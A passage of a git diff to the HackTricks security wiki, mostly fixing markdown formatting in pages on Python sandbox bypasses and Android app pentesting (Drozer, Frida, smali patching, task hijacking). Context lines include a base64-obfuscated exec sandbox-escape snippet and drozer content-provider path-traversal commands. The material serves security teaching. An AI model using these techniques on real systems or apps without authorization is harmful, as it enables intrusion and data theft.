(it isn't 3^2)\ If you do 2/3 it returns 1 because you are dividing two ints. If you want decimals you should divide floats (2.0/3.0).\ i >= j\ i <= j\ @@ -179,7 +179,7 @@ for f, b in zip(foo, bar): **Lambda** is used to define a function\ (lambda x,y: x+y)(5,3) = 8 --> Use lambda as simple **function**\ -**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\ +**sorted**(range(-5,6), key=lambda x: x** 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\ m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Use lambda to filter\ **reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24 diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index 284acb11..5223dbeb 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -118,8 +118,8 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ## Builtins -* ****[**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)**** -* ****[**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)**** +* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) +* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) If you can access to the**`__builtins__`** object you can import libraries (notice that you could also use here other string representation showed in last section): @@ -547,7 +547,7 @@ class HAL9000(object): #I'm afraid I can't do that. ``` -**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)**** +**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) ### Sensitive Information Disclosure Payloads @@ -565,7 +565,7 @@ class HAL9000(object): ## Dissecting Python Objects {% hint style="info" %} -If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)**** +If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) {% endhint %} In some CTFs you could be provided the name of a **custom function where the flag** resides and you need to see the **internals** of the **function** to extract it. @@ -605,7 +605,7 @@ get_flag.__globals__ CustomClassObject.__class__.__init__.__globals__ ``` -[**See here more places to obtain globals**](./#globals-and-locals)**** +[**See here more places to obtain globals**](./#globals-and-locals) ### **Accessing the function code** @@ -854,7 +854,7 @@ def check_permission(super_user): print(f"\nNot a Super User!!!\n") ``` -will be bypassed +will be bypassed ## References diff --git a/misc/basic-python/magic-methods.md b/misc/basic-python/magic-methods.md index 23d479b4..1e9a99c9 100644 --- a/misc/basic-python/magic-methods.md +++ b/misc/basic-python/magic-methods.md @@ -6,7 +6,7 @@ You can access the **methods** of a **class** using **\_\_dict\_\_.** ![](<../../.gitbook/assets/image (42).png>) -You can access the functions +You can access the functions ![](<../../.gitbook/assets/image (45).png>) @@ -30,7 +30,7 @@ You can access the **methods** of the **class** of an **object chainning** magic ## Server Side Template Injection -Interesting functions to exploit this vulnerability +Interesting functions to exploit this vulnerability ``` __init__.__globals__ diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index 09280d63..a64ac6e5 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -27,7 +27,7 @@ It's highly recommended to start reading this page to know about the **most impo This is the main tool you need to connect to an android device (emulated or physical).\ It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more. -Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb. +Take a look to the following list of [**ADB Commands**](adb-commands.md) \_**\_to learn how to use adb. ## Smali @@ -305,13 +305,13 @@ Drozer is s useful tool to **exploit exported activities, exported services and ### Exploiting exported Activities -\*\*\*\*[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ -\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method. +[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\ +\_**\_Also remember that the code of an activity starts with the `onCreate` method. #### Authorisation bypass When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**\ -[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)\*\*\*\* +[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities) You can also start an exported activity from adb: @@ -334,14 +334,14 @@ Note that an authorisation bypass is not always a vulnerability, it would depend ### Exploiting Content Providers - Accessing and manipulating sensitive information -\*\*\*\*[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\ +[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\ Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.\ -[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)\*\*\*\* +[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers) ### **Exploiting Services** [**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\ -\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`. +\_**\_Remember that a the actions of a Service start in the method `onStartCommand`. As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\ [**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services) @@ -349,7 +349,7 @@ As service is basically something that **can receive data**, **process** it and ### **Exploiting Broadcast Receivers** [**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\ -\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. +\_**\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`. A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\ [**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers) @@ -437,7 +437,7 @@ Dynamic instrumentation toolkit for developers, reverse-engineers, and security **Learn how to use Frida:** [**Frida tutorial**](frida-tutorial/)\ **Some "GUI" for actions with Frida:** [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)\ **Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)\ -**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)\*\*\*\* +**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) ### **Android Application Analyzer** @@ -457,7 +457,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b * **JavaScript Injection (XSS):** Verify that JavaScript and Plugin support is disabled for any WebViews (disabled by default). [More info here](webview-attacks.md#javascript-enabled). * **Local File Inclusion:** Verify that File System Access is disabled for any WebViews (enabled by default) `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled). * **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk -* \*\*\*\*[**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) +* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) ## Automatic Analysis @@ -496,7 +496,7 @@ By default, it will also use some Frida Scripts to **bypass SSL pinning**, **roo MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report. To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\ -MobSF also allows you to load your own \*\*Frida scripts (\*\*to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). +MobSF also allows you to load your own **Frida scripts (**to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**"). ![](<../../.gitbook/assets/image (215).png>) @@ -686,7 +686,7 @@ APKiD gives you information about **how an APK was made**. It identifies many ** ### Manual -[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)\*\*\*\* +[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md) ## Labs diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md index 2965e61f..59f5990d 100644 --- a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md +++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md @@ -10,7 +10,7 @@ C:\Users\\AppData\Local\Android\sdk\platform-tools\adb.exe /Users//Library/Android/sdk/platform-tools/adb ``` -**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com)**** +**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com) ## Connection diff --git a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md index 17b5dc47..151ca212 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md @@ -92,7 +92,7 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\ * assets/ * Any other files that may be needed by the app. * Additional native libraries or DEX files may be included here. This can happen especially when malware authors want to try and “hide” additional code, native or Dalvik, by not including it in the default locations. - * res/ + * res/ * the directory containing resources not compiled into resources.arsc ### **Dalvik & Smali** @@ -198,7 +198,7 @@ If you find functions containing the word "sticky" like **`sendStickyBroadcast`* ## Deep links / URL schemes -**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called: +**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called: ![](<../../.gitbook/assets/image (214).png>) @@ -210,7 +210,7 @@ If inside the `intent-filter`you find something like this: Then, it's expecting something like `http://www.example.com/gizmos` - If you find something like this: +If you find something like this: ![](<../../.gitbook/assets/image (262).png>) diff --git a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md index 71320a74..9e86f1ed 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md @@ -1,6 +1,6 @@ # Burp Suite Configuration for Android -**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)**** +**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533) ## Add a proxy in Burp Suite to listen. diff --git a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md index 95747804..d6e9f495 100644 --- a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md @@ -65,7 +65,7 @@ When the launchMode is set to `singleTask`, the Android system evaluates three p The victim needs to have the **malicious** **app** **installed** in his device. Then, he needs to **open** **it** **before** opening the **vulnerable** **application**. Then, when the **vulnerable** application is **opened**, the **malicious** **application** will be **opened** **instead**. If this malicious application presents the **same** **login** as the vulnerable application the **user won't have any means to know that he is putting his credentials in a malicious application**. -**You can find an attack implemented here:** [**https://github.com/az0mb13/Task\_Hijacking\_Strandhogg**](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg)**** +**You can find an attack implemented here:** [**https://github.com/az0mb13/Task\_Hijacking\_Strandhogg**](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg) ## Preventing task hijacking @@ -73,5 +73,5 @@ Setting `taskAffinity=""` can be a quick fix for this issue. The launch mode can ## **References** -* ****[**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/)**** -* ****[**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)**** +* [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/) +* [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md index 284ef6b5..2a5b4f75 100644 --- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md +++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md @@ -47,10 +47,10 @@ Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**] If you modify the code, then you can **export it**.\ One bad thing of bytecode-viewer is that it **doesn't have references** or **cross-references.** -### ****[**Enjarify**](https://github.com/Storyyeller/enjarify)**** +### [**Enjarify**](https://github.com/Storyyeller/enjarify) Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.\ -****Dex2jar is an older tool that also tries to translate Dalvik to Java bytecode. It works reasonably well most of the time, but a lot of obscure features or edge cases will cause it to fail or even silently produce incorrect results. By contrast, Enjarify is designed to work in as many cases as possible, even for code where Dex2jar would fail. Among other things, Enjarify correctly handles unicode class names, constants used as multiple types, implicit casts, exception handlers jumping into normal control flow, classes that reference too many constants, very long methods, exception handlers after a catchall handler, and static initial values of the wrong type. +Dex2jar is an older tool that also tries to translate Dalvik to Java bytecode. It works reasonably well most of the time, but a lot of obscure features or edge cases will cause it to fail or even silently produce incorrect results. By contrast, Enjarify is designed to work in as many cases as possible, even for code where Dex2jar would fail. Among other things, Enjarify correctly handles unicode class names, constants used as multiple types, implicit casts, exception handlers jumping into normal control flow, classes that reference too many constants, very long methods, exception handlers after a catchall handler, and static initial values of the wrong type. ### [CFR](https://github.com/leibnitz27/cfr) diff --git a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md index e4e2cb98..cb390fee 100644 --- a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -28,12 +28,12 @@ If you installed Android Studio, you can just open the main project view and acc ![](<../../.gitbook/assets/image (330).png>) Then, click on _**Create Virtual Device**_, _**select** the phone you want to use_ and click on _**Next.**_\ -\_\*\*\*\*\_In the current view you are going to be able to **select and download the Android image** that the phone is going to run: +\_\_In the current view you are going to be able to **select and download the Android image** that the phone is going to run: ![](<../../.gitbook/assets/image (331).png>) -So, select it and click on _**Download**_\*\* (**now wait until the image is downloaded).**\ -**Once the image is downloaded, just select \_**Next**\_ and \_**Finish\*\*\_. +So, select it and click on _**Download**_** (**now wait until the image is downloaded).**\ +**Once the image is downloaded, just select \_**Next**\_ and \_**Finish**\_. ![](<../../.gitbook/assets/image (332).png>) @@ -105,7 +105,7 @@ id: 9 or "Nexus 5X" ``` Once you have decide the name of the device you want to use, you need to **decide which Android image you want to run in this device.**\ -\*\*\*\*You can list all the options using `sdkmanager`: +You can list all the options using `sdkmanager`: ```bash C:\Users\\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list diff --git a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md index c8f3e47c..0520c63c 100644 --- a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md +++ b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md @@ -97,4 +97,4 @@ A proof-of-concept is pretty straightforward. An HTML document that uses `XMLHtt ``` -**Information taken from this writeup:** [**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**** +**Information taken from this writeup:** [**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/) diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 51cce54d..983bc27c 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -57,7 +57,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Passwords/ ``` -You should also check the **ContentProvider code** to search for queries: +You should also check the **ContentProvider code** to search for queries: ![](<../../../.gitbook/assets/image (121) (1) (1).png>) @@ -173,7 +173,7 @@ dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc ### **Path Traversal** -If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). +If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). ``` dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts diff --git a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index 8e1f6ac5..1a8fce04 100644 --- a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -1,6 +1,6 @@ # Exploiting a debuggeable applciation -**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)**** +**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article) To make this article more interesting, I have developed a vulnerable application for demonstration purposes, which has a “**button**” and a “**textview**“. diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md index 2e843a8c..4e2047b7 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -46,7 +46,7 @@ Follow the[ link to read it.](frida-tutorial-2.md) **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) Follow the [link to read it](owaspuncrackable-1.md).\ -**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)**** +**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) ## Fast Examples @@ -129,7 +129,7 @@ Hook android `.onCreate()` ### Hooking functions with parameters and retrieving the value - Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: +Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: ```javascript function getString(data){ diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index 6c58fec8..0ef16d3f 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -28,13 +28,13 @@ Java.perform(function x() { //Hook "fun" with paramater(String) var string_class = Java.use("java.lang.String"); my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function - console.log("*************************************") + console.log("*") //Create a new String and call the function with your input. var my_string = string_class.$new("My TeSt String#####"); console.log("Original arg: " + x); var ret = this.fun(my_string); console.log("Return value: " + ret); - console.log("*************************************") + console.log("*") return ret; }; //Find an instance of the class and call "secret" function. diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index c19c0695..d02166e4 100644 --- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -3,9 +3,9 @@ **From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -## Solution 1 +## Solution 1 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) **Hook the **_**exit()**_ function and **decrypt function** so it print the flag in frida console when you press verify: @@ -48,7 +48,7 @@ Java.perform(function () { ## Solution 2 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) **Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify: diff --git a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index 1ed185bf..692969ac 100644 --- a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -14,7 +14,7 @@ Reading the java code: ![](<../../.gitbook/assets/image (47).png>) -It looks like the function that is going print the flag is **m().** +It looks like the function that is going print the flag is **m().** ## **Smali changes** diff --git a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md index 5f6ffe30..fd6d9378 100644 --- a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md +++ b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md @@ -1,6 +1,6 @@ # Inspeckage Tutorial -**Tutorial copied from** [**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7)**** +**Tutorial copied from** [**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7) ### Install Xposed Framework diff --git a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md index 08802820..fec8c766 100644 --- a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md +++ b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md @@ -1,12 +1,12 @@ # Intent Injection -**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**** +**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/) ## Introduction This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object. \ Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc. \ -This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. +This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. {% hint style="info" %} As summary: If an attacker can send an Intent that is being insecurely executed he can potentially access not exported components and abuse them. diff --git a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md index 4889206c..9ccd9d66 100644 --- a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md +++ b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md @@ -1,6 +1,6 @@ # React Native Application -**Information copied from** [**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)**** +**Information copied from** [**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7) React Native is a **mobile application framework** that is most commonly used to develop applications for **Android** and **iOS** by enabling the use of React and native platform capabilities. These days, it’s become increasingly popular to use React across platforms.\ But most of the time, the core logic of the application lies in the React Native **JavaScript that can be obtained** without needing to use dex2jar. diff --git a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md index f1c5ef0c..90abc358 100644 --- a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md @@ -46,7 +46,7 @@ apktool b . #In the folder generated when you decompiled the application It will **compile** the new APK **inside** the _**dist**_ folder. -If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)\*\*\*\* +If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) ### **Sing the new APK** @@ -73,7 +73,7 @@ zipalign -v 4 infile.apk ### **Sign the new APK (again?)** -If you **prefer** to use **\*\*\[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). +If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk diff --git a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index ba59a66b..7dcf8cc1 100644 --- 